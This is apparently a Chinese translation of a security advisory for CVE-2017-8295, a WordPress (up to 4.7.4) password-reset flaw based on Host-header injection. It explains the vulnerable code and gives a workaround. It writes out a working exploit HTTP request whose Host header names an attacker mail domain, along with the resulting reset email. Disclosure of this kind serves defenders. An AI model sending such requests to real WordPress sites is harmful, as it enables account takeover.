86931238 2017-05-05
漏洞提交者:Dawid Golunski
漏洞编号:CVE-2017-8295
发布日期:2017-05-03
修订版本:1.0
漏洞危害:中/高
WordPress内核<= 4.7.4存在未经授权的密码重置(0day)
WordPress是一个以PHP和MySQL为平台的自由开源的博客软件和内容管理系统。截止2017年2月,Alexa排名前1000万的站点中约有27.5%使用该管理系统。据报道有超过6000万站点使用WordPress进行站点管理或者作为博客系统。
WordPress的重置密码功能存在漏洞,在某些情况下不需要使用之前的身份令牌验证获取密码重置链接。
该攻击可导致攻击者在未经授权的情况下获取用户Wordpress后台管理权限。
该漏洞源于WordPress默认使用不可信的数据。当生成一个密码重置邮件时应当是仅发送给与帐户相关联的电子邮件。
从下面的代码片段可以看出,在调用PHP mail()函数前创建了一个From email头
------[ wp-includes/pluggable.php ]------ ... if ( !isset( $from_email ) ) { // Get the site domain and get rid of www. $sitename = strtolower( $_SERVER['SERVER_NAME'] ); if ( substr( $sitename, 0, 4 ) == 'www.' ) { $sitename = substr( $sitename, 4 ); } $from_email = 'wordpress@' . $sitename; } ... -----------------------------------------
正如我们所看到的,Wordpress为了生成重置邮件创建的一个From/Return-Path(发件人/收件人)头,使用SERVER_NAME变量以获取服务器的主机名。
然而,诸如Apache的主流web服务器默认使用由客户端提供的主机名来设置SERVER_NAME变量(参考Apache文档)
由于SERVER_NAME可以进行修改,攻击者可以任意设置该值,例如attackers-mxserver.com
这将导致Wordpress的$from_email变为[email protected],最终导致包含From/Return-Path(发件人/收件人)设置的密码重置邮件发送到了该恶意邮件地址。
至于攻击者可以修改哪那一封电子邮件的头信息,这取决于服务器环境(参考PHP文档)
基于邮件服务器的配置,可能导致被修改过邮件头的恶意收件人/发件人地址的电子邮件发送给WordPress用户。
这使得攻击者能够在不需要进行交互就可以截取本该是需要进行交互才能进行的操作的密码重置邮件。
如果攻击者将类似下面的请求发送到默认可通过IP地址访问的Wordpress安装页面(IP-based vhost):
-----[ HTTP Request ]---- POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1 Host: injected-attackers-mxserver.com Content-Type: application/x-www-form-urlencoded Content-Length: 56 user_login=admin&redirect_to=&wp-submit=Get+New+Password ------------------------
WordPress将触发管理员账户的密码重置功能
由于修改了主机头,SERVER_NAME变量将被设置为攻击者所选择的主机名,因此Wordpress会将以下电子邮件头信息和正文传递给/usr/bin/sendmail
------[ resulting e-mail ]----- Subject: [CompanyX WP] Password Reset Return-Path: <[email protected]> From: WordPress <[email protected]> Message-ID: <[email protected]> X-Priority: 3 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit
有人请求将以下账户的密码进行重置:
http://companyX-wp/wp/wordpress/ Username: admin
如果是弄错了,直接忽略该邮件就好。重置密码请访问以下地址:
http://companyx-wp/wp/wordpress/wp-login.php?action=rp&key=AceiMFmkMR4fsmwxIZtZ&login=admin%3E
正如我们看到的,Return-Path, From, 以及Message-ID字段都是攻击者控制的域
通过bash脚本替换/usr/sbin/sendmail以执行头的验证:
#!/bin/bash cat > /tmp/outgoing-email
在利用成功的基础上,攻击者可重置用户密码并且未经授权获取WordPress账户访问权限。
WordPress至最新版本4.7.4全部受影响
目前没有官方解决方案可用。作为临时解决方案,用户可以启用UseCanonicalName执行SERVER_NAME静态值(参考Apache)
https://legalhackers.com https://ExploitBox.io Vendor site: https://wordpress.org http://httpd.apache.org/docs/2.4/mod/core.html#usecanonicalname http://php.net/manual/en/function.mail.php https://tools.ietf.org/html/rfc5321
*参考来源:exploitbox,freebuf小编鸢尾编译,转载请注明来自FreeBuf.com